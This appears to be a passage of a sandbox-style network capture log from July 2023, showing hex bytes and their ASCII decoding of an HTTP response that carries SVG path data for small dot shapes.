30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: s="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M879,279a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14999INData Raw: 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 36 2e 38 38 2c 31 38 31 2e 31 38 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M896.88,181.18a1.72,1.72,0,0,1-.78,2.24,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15015INData Raw: 2d 33 2e 33 34 2d 31 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 33 35 2c 32 37 37 2e 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70
                                                                                                                                                                                                                                                                          Data Ascii: -3.34-1,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M928.35,277.3a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><p
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15031INData Raw: 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 32 31 2c 32 39 33 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 34 34 2c 33 30 30 2e 30 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.21,293.24a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.44,300.07a1.7,1.7,0,0,1,.77-2.2,2.47
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15047INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 34 35 2c 32 30 35 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 36 39 2c 32 31 32 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                          Data Ascii: cls-4" d="M1007.45,205.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M1007.69,212.24a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15063INData Raw: 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 36 2e 39 33 2c 31 32 34 2e 34 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 37 2e 31 36 2c 31 33 31 2e 32 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34
                                                                                                                                                                                                                                                                          Data Ascii: .08,0,0,1-.15-2.81"></path><path class="cls-4" d="M976.93,124.42a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.38,2.38,0,0,1-.51,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M977.16,131.24a1.7,1.7,0,0,1,.77-2.2,2.4
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15079INData Raw: 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 38 32 2c 32 33 34 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                          Data Ascii: -.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M959.82,234.37a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15095INData Raw: 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 33 2c 31 35 33 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                                                                                                                          Data Ascii: ,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.3,153.37a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15111INData Raw: 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2e 31 38 2c 32 36 33 2e 33 33 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: 2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912.18,263.33a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15127INData Raw: 4d 38 38 31 2e 34 33 2c 31 37 35 2e 35 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 38 31 2e 36 36 2c 31 38 32 2e 33 33 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c
                                                                                                                                                                                                                                                                          Data Ascii: M881.43,175.5a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M881.66,182.33a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15143INData Raw: 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 33 31 2c 32 38 35 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 35 34 2c 32 39 32 2e 32 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33
                                                                                                                                                                                                                                                                          Data Ascii: </path><path class="cls-4" d="M864.31,285.45a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M864.54,292.28a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15159INData Raw: 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 33 2e 37 39 2c 32 30 34 2e 34 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 34 2c 32 31 31 2e 32 38 61 31 2e 37 2c 31 2e 37 2c
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M833.79,204.46a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M834,211.28a1.7,1.7,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15175INData Raw: 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 33 2e 32 37 2c 31 32 33 2e 34 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><path class="cls-4" d="M803.27,123.46a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15191INData Raw: 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 36 2e 31 35 2c 32 33 33 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                                          Data Ascii: 9.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M786.15,233.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"></path><path
                                                                                                                                                                                                                                                                          2023-07-05 06:07:53 UTC15617INData Raw: 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 32 2c 32 36 37 2e 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 31 2e 37 31 2c 32 35 39 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: h class="cls-7" d="M522,267.3a1.91,1.91,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M521.71,259.58a1.91,1.91,0,0,1-.86,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:53 UTC15633INData Raw: 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 35 38 2c 31 35 30 2e 37 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                                          Data Ascii: 2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M541.58,150.76a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path c
                                                                                                                                                                                                                                                                          2023-07-05 06:07:53 UTC15649INData Raw: 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 35 39 2c 32 35 37 2e 37 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 33 33 2c 32 35 30 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: 8,3.17"></path><path class="cls-7" d="M576.59,257.72a1.91,1.91,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M576.33,250a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:53 UTC15665INData Raw: 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 32 2c 31 34 31 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20
